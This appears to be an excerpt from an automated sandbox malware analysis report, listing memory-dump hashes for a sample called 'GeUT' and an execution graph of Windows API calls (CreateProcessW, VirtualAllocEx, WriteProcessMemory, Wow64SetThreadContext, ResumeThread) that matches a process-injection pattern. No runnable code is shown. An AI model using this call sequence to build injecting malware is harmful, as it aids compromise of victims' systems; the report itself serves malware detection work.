                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ea8ae4cb44e29ae7d91fb6c3ee49aa0d893457dbd9e6d889188b7c8c50f1e2b8
                      • Instruction ID: abb3dcabb689dae0ad4c53624bd32b72e5905b3d26554719e9841986d83fbd26
                      • Opcode Fuzzy Hash: ea8ae4cb44e29ae7d91fb6c3ee49aa0d893457dbd9e6d889188b7c8c50f1e2b8
                      • Instruction Fuzzy Hash: E9215E70E0020ADFDB04EBB9D990A6DBFB2FF88300F104569D615A7351EB746A81CF51
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b61d66d2d47be0c5d43a78e71a03fc64a49d41479dbd846c80d5a37e6682a91e
                      • Instruction ID: fc7e71eb809ef41c96a0a261212c7fb787a6b6db41537b3f14d05849bc9e1fd8
                      • Opcode Fuzzy Hash: b61d66d2d47be0c5d43a78e71a03fc64a49d41479dbd846c80d5a37e6682a91e
                      • Instruction Fuzzy Hash: 11215C70E0020ADFDB04EBB9D880AADBBB2FF88300F104569D615A7351EB746A81CF51
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7c755912c6e0fe73d346c372c7360a99378f36a6bac2743a53655324cd1611a
                      • Instruction ID: 1c07e099ad1af26cd0f926987f2dac14be47e7048a672ecd8e02d5faa2fafe27
                      • Opcode Fuzzy Hash: b7c755912c6e0fe73d346c372c7360a99378f36a6bac2743a53655324cd1611a
                      • Instruction Fuzzy Hash: B021BB30E052489FDB55EBB8C8517AEBFB2EF84340F1480ADC649EB296DB304D06CB81
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0a844b627e42fd32cfd9cc7b05082acb3e9685af400305ebcacd8518c719491c
                      • Instruction ID: 496fdabc7609885cc159bbb441ee313c5f64878cf6b8e50ed0743fc7fc9b9a71
                      • Opcode Fuzzy Hash: 0a844b627e42fd32cfd9cc7b05082acb3e9685af400305ebcacd8518c719491c
                      • Instruction Fuzzy Hash: BE214C3010524ACFDB06DB2AFE90A553F71FB85304B00A69DD5549B262DABC6D8BDF81
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ff577031ef9614ccc0ab38f2f839a64847806284f0c1777b07e780445fced6ec
                      • Instruction ID: 9dd835f286a802bdbc1c06e831d08a7e0eddf808e7e08570ae10b3b227265f7c
                      • Opcode Fuzzy Hash: ff577031ef9614ccc0ab38f2f839a64847806284f0c1777b07e780445fced6ec
                      • Instruction Fuzzy Hash: 4B11B97050020BCFDB09DF2AFA80A557FB5F788304B10A69C95149B215DABC6E8BDF81
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 91d9517e3b905e49dfed59f4b83e031dc8883a2d8881f038b0a75b98c5137c3d
                      • Instruction ID: 0b56ceeeb1f92ff07d3df7da274581245af64a7a582df756b7ff69f76ce6cf8b
                      • Opcode Fuzzy Hash: 91d9517e3b905e49dfed59f4b83e031dc8883a2d8881f038b0a75b98c5137c3d
                      • Instruction Fuzzy Hash: 9E518E70A00246CFDB58EB79E89852E7FA6FBC5300B005A3DD6179B295EF789C458B81
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59992d2c85ea2d21f9e3cec87db25500f709dd5182bb1de27df8a4c302f7467e
                      • Instruction ID: 84fba2dd6479c8501b7f4def276e1894079fcceaacf3a17c08f340a241ac6d67
                      • Opcode Fuzzy Hash: 59992d2c85ea2d21f9e3cec87db25500f709dd5182bb1de27df8a4c302f7467e
                      • Instruction Fuzzy Hash: E8918E30B00246CFDB54EB79D858A2E7FA6FBC5300B105969E516DB3A5EF749C058B81
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 66fece5e944ce60c11808e91bd91dd5dada06698eea0830fc7cf68bed6a2742d
                      • Instruction ID: bf490304c939d095f34ab9c135daa7d340f35778f35339784c6df9129e2d557c
                      • Opcode Fuzzy Hash: 66fece5e944ce60c11808e91bd91dd5dada06698eea0830fc7cf68bed6a2742d
                      • Instruction Fuzzy Hash: 05318931B00B418BDBA5AB7D881852EBAE6FFC5310710893DD667CB784EFB49C048B91
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 670b0da87280542936c0102c3650c32091458bd60b72d17a92d6a3cb20795a75
                      • Instruction ID: 8ac570ed4b569e82d9afaacc730437c799946077c7ee6950c44b9bff4f8355b2
                      • Opcode Fuzzy Hash: 670b0da87280542936c0102c3650c32091458bd60b72d17a92d6a3cb20795a75
                      • Instruction Fuzzy Hash: 53216D71B002469BDB54EBFD881936FBAEAEFC8350F14842ED64AD7386DE748C0147A1
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 95b566a910672473ca1858e6dc9ba3fdffb47853c8ff6d42ab5b1589dc551ed0
                      • Instruction ID: e0ea33d3d4f3ef4b20a02b669f28a2b7dcee61e4ed6a70499439e441c81b5cad
                      • Opcode Fuzzy Hash: 95b566a910672473ca1858e6dc9ba3fdffb47853c8ff6d42ab5b1589dc551ed0
                      • Instruction Fuzzy Hash: B1216B70E0020ADFDB44EBB9D9446ADBFB6FF88300F104669D515A7345EBB8AA80CB51
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 20562cd2b4242801e48e74292429861455a0b0a730e7ca1d70f1bec3e843a015
                      • Instruction ID: a3f025234512ec32ee30c13479152aadb3b22c18d5caf0b7073bf26001178677
                      • Opcode Fuzzy Hash: 20562cd2b4242801e48e74292429861455a0b0a730e7ca1d70f1bec3e843a015
                      • Instruction Fuzzy Hash: 2321C230E05248DFDB44EBB8C85579EBBF5EF84304F1084A9D509DB286EB709D04CB91
                      Memory Dump Source
                      • Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bfe537ecf22a88411727c1a339fca07a877bd154eff96329d43b28564965c77
                      • Instruction ID: 8fe8db3c9c639f9bba88680c0f2f9a7eb2d882c5a83c271e92e8eaee3ddea592
                      • Opcode Fuzzy Hash: 4bfe537ecf22a88411727c1a339fca07a877bd154eff96329d43b28564965c77
                      • Instruction Fuzzy Hash: BF11C13050124BCFDB05EF1EFA809553BA6F788304B00A69CD5149B255DBBCED8A8F81
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b065e03b2b870d2488a956b0f9af619a60da332af2cef7229924983131a27e3
                      • Instruction ID: 7c4a5bb40598863709ecb94b9d9d69610e28d487908266a9d6f4744c2fa78a97
                      • Opcode Fuzzy Hash: 4b065e03b2b870d2488a956b0f9af619a60da332af2cef7229924983131a27e3
                      • Instruction Fuzzy Hash: 78511975600642CFDB15BB78E86C56E7FE2FB842113409A3DD1168B3A9EF74A909CB81
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6517e67e09094cf85c433ead92d5e315bd38e60b8415fa6c465292a1ffb1543
                      • Instruction ID: 9928c7512eca701cd26277e3b057bb58c4e6f02cddc851a988083af15ec98dfe
                      • Opcode Fuzzy Hash: a6517e67e09094cf85c433ead92d5e315bd38e60b8415fa6c465292a1ffb1543
                      • Instruction Fuzzy Hash: 90917F35700646CFDB15EB78E858A6E7FF2FB88201B40496DD106DB3A9EF749C098B81
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3700b987f8fba8459b7244828ffe4f6ab2d2c8ff4abe724d0eab61b09e2ced26
                      • Instruction ID: bbf2729268eb233b2181bca5e3475a87c43c2eb6e9ad2ccab831768bba077260
                      • Opcode Fuzzy Hash: 3700b987f8fba8459b7244828ffe4f6ab2d2c8ff4abe724d0eab61b09e2ced26
                      • Instruction Fuzzy Hash: 4A317A71B00B418BEA25AB79D81852E7AE2BFC52213108E3DC25BCB794DF749D048B92
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0ff69961f24afa5d1f18a4ef1e06f6dae060772fe24f232c1f270e5904d92170
                      • Instruction ID: 7bf8f8251c720a8b014cc8f928c52ae75c540f519045774be02b39aa3c7c9ae8
                      • Opcode Fuzzy Hash: 0ff69961f24afa5d1f18a4ef1e06f6dae060772fe24f232c1f270e5904d92170
                      • Instruction Fuzzy Hash: FB315C75D0020ADFDB44EBB8E884AAE7FB2FF84300F108A6DD505A7354EB706A45CB51
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0eaae72400c1e386e0d318ba25312c125a18a3583052718741b451f28d771c08
                      • Instruction ID: b67560873836c0fc84671ed631b3450e75c352b21f43ff3546d90c501c21f871
                      • Opcode Fuzzy Hash: 0eaae72400c1e386e0d318ba25312c125a18a3583052718741b451f28d771c08
                      • Instruction Fuzzy Hash: 8F215E71B002059FDB54EBFA981837EBEEAFFC8610B14842ED64AD7355DE748C0587A2
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f1496ff3d44b708e4f688f9eabcaa37e1c8083869120af39a9522545284b1002
                      • Instruction ID: b997de1e24740a6a31333540a7a2e01253e8f89877796ad7ad397e7ac5de8b23
                      • Opcode Fuzzy Hash: f1496ff3d44b708e4f688f9eabcaa37e1c8083869120af39a9522545284b1002
                      • Instruction Fuzzy Hash: CB214C75E0020ADFDB45EBB8D894AADBFB2FF84300F108A6DD105A7355EB706A44CB51
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2719ed8d6127e3e327ad3e47d9f0984ee6410364df38c5b74fa01415ea2cab0e
                      • Instruction ID: fc055b6b72968169afbcdb84372a851f1a1621a017a2b387279e530fa7498c9b
                      • Opcode Fuzzy Hash: 2719ed8d6127e3e327ad3e47d9f0984ee6410364df38c5b74fa01415ea2cab0e
                      • Instruction Fuzzy Hash: 18215830E11208CFDB58EBB8D4553AE7BE2EFC4210F1485AED509AB795EB704E05CB91
                      Memory Dump Source
                      • Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b65811148832ee321ede5bc253d09cf3bd30658cfabceb595bdc6b827d966c3e
                      • Instruction ID: 1746df4b203a725cd893ad30a117319b20c781b53b90502505413e1ff45cb9aa
                      • Opcode Fuzzy Hash: b65811148832ee321ede5bc253d09cf3bd30658cfabceb595bdc6b827d966c3e
                      • Instruction Fuzzy Hash: 48118937901247DFDB06FF28F980A597BB5FB84304B04AA5C91049B36DFAB47909AF90
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2592e3d3f12dacadbc3e9c50d75aba534c253bd79de6f6b07a6dee97f0e0f345
                      • Instruction ID: ae094dd2b42ee54ac2534d58447c305e00a1b91f3d071db335961872a7f9111e
                      • Opcode Fuzzy Hash: 2592e3d3f12dacadbc3e9c50d75aba534c253bd79de6f6b07a6dee97f0e0f345
                      • Instruction Fuzzy Hash: CC517C706012428FDB18FF78E96C56E7FA6FBC46113004A3CD94697269EF789C088B81
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e643d4795eca22c6ecf705c8129193cc6ce84075686816cf3e728711d095112e
                      • Instruction ID: 6bcf9aeedb3db39adfd5af42e30dae8133a7abb19b144b3eb41d38609747b146
                      • Opcode Fuzzy Hash: e643d4795eca22c6ecf705c8129193cc6ce84075686816cf3e728711d095112e
                      • Instruction Fuzzy Hash: 64917D307002468FDB14EF78E958A6E7FA6FBC4600B00493DD546DB3A9DF789C098B81
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 148687dc883adda58e819f9110873eff351cc8b0826917e2a8ba0bce8ba05749
                      • Instruction ID: d68cea5166935727dac850ede32984fe4dcb6dd965025020141f214f33bee52a
                      • Opcode Fuzzy Hash: 148687dc883adda58e819f9110873eff351cc8b0826917e2a8ba0bce8ba05749
                      • Instruction Fuzzy Hash: 1231AD71B01B418BDA69EB79C81812E7EEABFC4211300893DC55BCB798DF749D048BC2
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb609ecd7efe7ddc230b97ec6d0e07e789c8b4b7e5f3191c270ab4784f2e4f56
                      • Instruction ID: cdbe118b58323a043ed379beaad5c5729307c8cb3a6279aaaa4422f158e0db74
                      • Opcode Fuzzy Hash: bb609ecd7efe7ddc230b97ec6d0e07e789c8b4b7e5f3191c270ab4784f2e4f56
                      • Instruction Fuzzy Hash: C02190B1B012459BDB44ABFA881836FBEEEEFD8210B14842ED54BD7355DE348C0547A2
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 410c8291a15334b2e74fc1283f7f425ff94b3112e3ff4a79719e65a97697353f
                      • Instruction ID: 8adc4be6435c2d9012889693e5942066f5234a89c6feacb18f83741a95e334df
                      • Opcode Fuzzy Hash: 410c8291a15334b2e74fc1283f7f425ff94b3112e3ff4a79719e65a97697353f
                      • Instruction Fuzzy Hash: 4831187090020ADFDB44EFB8D9546AEBBB2EF84300F20867DD505BB355EB796A50CB51
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1ad16dfc4553c0e1dac66c53e695fb8efa7384e0cd67c302f4f0fed251c1dbb0
                      • Instruction ID: 4b42ed4f26a65cfe0ebd70ed4750a8404ba48479fd0e59487112cf274c1dff13
                      • Opcode Fuzzy Hash: 1ad16dfc4553c0e1dac66c53e695fb8efa7384e0cd67c302f4f0fed251c1dbb0
                      • Instruction Fuzzy Hash: 56217C30E452088FDB94EBB8D8556AE7BF6EF84204F1480AAC40AEB259DB308D05CB91
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 65584e95bf4bcdf08d94ec1bf65765d4f8becfc75aa1c0069eb6b25bdc821719
                      • Instruction ID: e325c3970d185739b64a5de4e4eb09d819aef650e833efc975eb434a2e9996c2
                      • Opcode Fuzzy Hash: 65584e95bf4bcdf08d94ec1bf65765d4f8becfc75aa1c0069eb6b25bdc821719
                      • Instruction Fuzzy Hash: A2212370A0020ADFDB04EFB8D954AADBBB6EF88200F10866DD505A7355EB796A50CB51
                      Memory Dump Source
                      • Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5e51061a0fa4ec7a810667dc15ede5666d6b2a265bcba51b7c802aa376e36c40
                      • Instruction ID: 107e3a9fe2c2378214ae2f3460e4634af17ed212e5c4f6983554027a66c81724
                      • Opcode Fuzzy Hash: 5e51061a0fa4ec7a810667dc15ede5666d6b2a265bcba51b7c802aa376e36c40
                      • Instruction Fuzzy Hash: 8B117770111206DFDB05EF28FB90A557BA5F7C4704B00A6BC9984BB225EBBD6D099F81
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b9f182899094e6a4a859b5041473df51eb640c2b836c94055c997e37206a6293
                      • Instruction ID: 9f4367c0df33a342cbf86ede97d4e0cec8a9e83fc5ae27adb0d0ab03b2c61ec2
                      • Opcode Fuzzy Hash: b9f182899094e6a4a859b5041473df51eb640c2b836c94055c997e37206a6293
                      • Instruction Fuzzy Hash: 3E513775610246CFDB5ABB78F85C52E7FB6FB843047109A2CD1168B3A9EF749C058B80
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cecdb07f1c7de7402c0d9babea0805dcdba44b5f85d496f5b0732cae89fb9784
                      • Instruction ID: 3819be7102f762a36d1617223cd304a9a1b70043602e658fe18e75c430d10ef8
                      • Opcode Fuzzy Hash: cecdb07f1c7de7402c0d9babea0805dcdba44b5f85d496f5b0732cae89fb9784
                      • Instruction Fuzzy Hash: D0915E357102468FDB55EB78E858A2E7FB6FF88304B10856DE116DB3A9DF749C058B80
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 94327490822b6f0e57323aac9dabd0644697c8bfa02f08e77ebf7dc361a561d6
                      • Instruction ID: e4370c29591f240db46c7fabecf683524a50f874f14552c26e4c270a7b57f993
                      • Opcode Fuzzy Hash: 94327490822b6f0e57323aac9dabd0644697c8bfa02f08e77ebf7dc361a561d6
                      • Instruction Fuzzy Hash: AF31AD31B10B468BDB69AB79A81812EBAE2BFC4214700893DD257CB794DF749C048BC1
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aab138418822d26f0090abb0e1594f4d62e704dc7d325377b6616d68cb8688b9
                      • Instruction ID: a28a4ce51bbf943dd65ea6b1e47b163f8e382f0aa753d520c28d990e6c0a777f
                      • Opcode Fuzzy Hash: aab138418822d26f0090abb0e1594f4d62e704dc7d325377b6616d68cb8688b9
                      • Instruction Fuzzy Hash: E6218171B002099BDB44EBF9985826EBAEBEFC8340B14842DDA4AD7346DE744C0147A1
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aa4f7071f2978ce0863359c4655e045b18c428ad2e9cf5c67abd6deed412f4dc
                      • Instruction ID: d03ba497d375eb6a5d4ef6a107c45c4168b9817a25d4e68af04949e3cd3a694c
                      • Opcode Fuzzy Hash: aa4f7071f2978ce0863359c4655e045b18c428ad2e9cf5c67abd6deed412f4dc
                      • Instruction Fuzzy Hash: D2313875D0020ADFDB45FBB8E8546AEBFB2EB84300F10866DD505AB395EB706A40CF50
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 24ed0a747401cca993179c5ac74e3db8d785e2a53812028b735585b6fecf3c6a
                      • Instruction ID: 8955527f6864edcf77f41e506e35ca85fc992b44939072f7aecad5f7ad8dca59
                      • Opcode Fuzzy Hash: 24ed0a747401cca993179c5ac74e3db8d785e2a53812028b735585b6fecf3c6a
                      • Instruction Fuzzy Hash: CF211775A0020ADFDB45FBB8E8946AEBFB6FB84300F10866DD505AB355EB706A40CF51
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8099c28e43c9cc40707292960eaf604d4c96c049b33e0292d3a5bade0366513c
                      • Instruction ID: 2a1ad91736bc1edbed1de7a26903bc5ff9fbc9371d9f171931b32b6f50420fcb
                      • Opcode Fuzzy Hash: 8099c28e43c9cc40707292960eaf604d4c96c049b33e0292d3a5bade0366513c
                      • Instruction Fuzzy Hash: 78218E30F15245CFCB45EBB8D8646AEBFF2AF85200F1481A9D6459B295DB304D05CB81
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 47b79eb3aad5d34d7e8a8da023c0fe7bd2c8fb6a5fdccbbe7732bda493362e23
                      • Instruction ID: e117290f842928cdc53cef4da93d39474460b626f62106cc516a2bb31bf4a390
                      • Opcode Fuzzy Hash: 47b79eb3aad5d34d7e8a8da023c0fe7bd2c8fb6a5fdccbbe7732bda493362e23
                      • Instruction Fuzzy Hash: 1E21CD36501246DFDB06FF28F890A657FB9FB81304B009A5DD1149F36ADAB46949CF80
                      Memory Dump Source
                      • Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e732f2df1fee8a3128e7182bb51e664cbbdabff6fc186a89d81defc12a27c8d0
                      • Instruction ID: 532eaa44f7745054126aaea02de36eb70d7c2d6df5a09cf0aaca722fd3bb2ed2
                      • Opcode Fuzzy Hash: e732f2df1fee8a3128e7182bb51e664cbbdabff6fc186a89d81defc12a27c8d0
                      • Instruction Fuzzy Hash: 21118C3690124BDFDB06FF18F984A657FB9F784304B40AA5CD1149F36DDAB469098F80

                      Execution Graph

                      Execution Coverage:30.5%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:20
                      Total number of Limit Nodes:2
                      execution_graph 3453 b92338 ResumeThread 3454 b923c0 3453->3454 3455 b921f8 3456 b92261 3455->3456 3457 b92276 WriteProcessMemory 3455->3457 3456->3457 3458 b922d8 3457->3458 3459 b95c78 3460 b95d05 CreateProcessW 3459->3460 3462 b95e5e 3460->3462 3462->3462 3463 b91fd8 ReadProcessMemory 3464 b92097 3463->3464 3475 b91ba8 3476 b91c35 CreateProcessW 3475->3476 3478 b91d8e 3476->3478 3479 b91ec8 3480 b91f3b Wow64SetThreadContext 3479->3480 3481 b91f26 3479->3481 3482 b91f84 3480->3482 3481->3480 3465 b920f0 VirtualAllocEx 3466 b921a7 3465->3466

                      Control-flow Graph

                      • Executed
                      • Not Executed
